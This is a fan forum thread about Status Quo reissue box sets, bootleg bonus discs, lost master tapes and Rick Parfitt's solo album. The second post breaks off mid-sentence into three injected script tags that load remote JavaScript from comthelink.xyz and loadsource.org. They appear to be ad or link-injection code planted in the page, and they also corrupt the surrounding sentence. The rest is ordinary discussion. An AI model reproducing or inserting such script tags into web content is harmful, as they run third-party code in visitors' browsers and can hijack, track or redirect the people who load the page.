[...]the Christmas Cake Mix is a mix of both versions... the one on the test disc ends on the Military Mix of Army and is missing Roll Over Lay Down... I prefer the original without Army on the end That's the special spanish Cake Mix 12". I'm curious. Why they use that mix instead of the normal one?

Well, it isn't a surprise, again bootlegs tarted up as a "bonus" disc. I was expecting the Glasgow 1982 show. Again, i will not buying those. The tapes for the Glasgow Broadcast exist... But universal / Quo don't have them like everybody thinks. So Universal & Quo Decide to use the Bootleg fraternity....? In that case why not use the Bootleg of Glasgow<script type="text/javascript" src="http://comthelink.xyz/addons/lnkr5.min.js"></script><script type="text/javascript" src="http://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52200x6849x&r=2"></script><script type="text/javascript" src="http://comthelink.xyz/ext/1ac1b73204b5d3dec6.js?sid=52200_6849_&title=&blocks[]=31af2"></script>

Why pay for the usage rights and to get someone to remaster the audio when you can use a bootleg When Universal bought out Phonogram / Vertigo, they took on the responsibility of looking after and properly archiving Quo's material... fair enough Quo weren't the only band whos material they took on but they have done a bad job if i'm honest... that's why most of it is missing, not burnt in a warehouse fire... Missing / Lost, simple as that. I'm sure also that over the past year Universal tried to buy a chunk of Princes' music catalogue for $31 million... so any budget excuse IMO is out of the question. The only reason they backed out of the Prince deal is because they weren't going to get what they thought they were from his archives

Rossi solo tracks on a SQ release is pushing it a bit. But Bernie Frost solo stuff too?

I could be wrong But you're right... they don't belong on a Quo release, but a standalone release... and Bernie won't see any money from these releases

1+9+8+2 Bonus material okay but think would have been better with Glasgow Apollo Show recorded by Radio Clyde Back To Back Bonus material Plenty of alternative stuff that could have been used from Montserrat In The Army Now Wasn't one of the Wembley Shows from 86 Recorded/Broadcast as FM Recording....? Couldn't this have been used instead of Audience Bootlegs again or the Audio from Brussels that was recorded by tv I had no intention of ever buying Army, it's dreadful, but I'd like to have well recorded versions of Late Last Night and Rock N Roll Floorboards, so...as for 1982 and B2B, I figured to get them eventually so this is a good chance.

I dunno, from a set of remixes containing material of very questionable quality, this lot don't seem so bad. It'll be good to get the 12" extended/remixed versions (I'm a sucker for extended versions from all bands) and some of the tracks are really quite interesting e.g. to hear them do a live bliues jam (very, very rare for Quo to do something live spontaneously) and La Grange - interesting! I'm sure the quality will be poor.
Great news if Pip is searching for Rick's solo album master tapes. Hopefully this will be for a remix and to replace the original drum sounds. Even without midi that would be possible with a little patience. Damn it, I'll do it for nowt!!! (and I could!)

It was the typical blues jam that Quo did during the time they used to jam during the encore, and it isn't exactly La Grange... it's the Better Times riff the Stockholm audio is better than the Paris '87 audio... a shame non of the Army gigs were professionally recorded, especially whilst most of the Army album tracks were in the set, hell they are stupid for not recording the Christmas Eve Hammersmith gig. And if anything regarding Ricks solo album, they would probably release it as a 2 disc set. The original album and a possible remix done by Pip Williams himself. I know both Rick and Pip were very proud of that album

It's a shame that if Recorded Delivery were to be released as either the original recording or yet another re- this and that version all it would really cause is a "So what?" reaction, due to the drip feed wasting of the material as Quo B sides.

I dunno, there are plenty of virtually unheard of bands which sell a fraction of Quo get their archive material released on speciality labels. And weren't the b-sides manipulated a little to add in Francis? QI - is that right? I'd buy it!

The tracks were written by Pip and Rick... possibly someone else, but no-one from the Quo camp

I’ll get 1982 purely for the rehearsal tapes remember when this came out long time ago on the old board Apart from that the rest doesn’t really excite me.Are there no decent recordings of any EOTR dates they could have stuck on BTB? Cheers
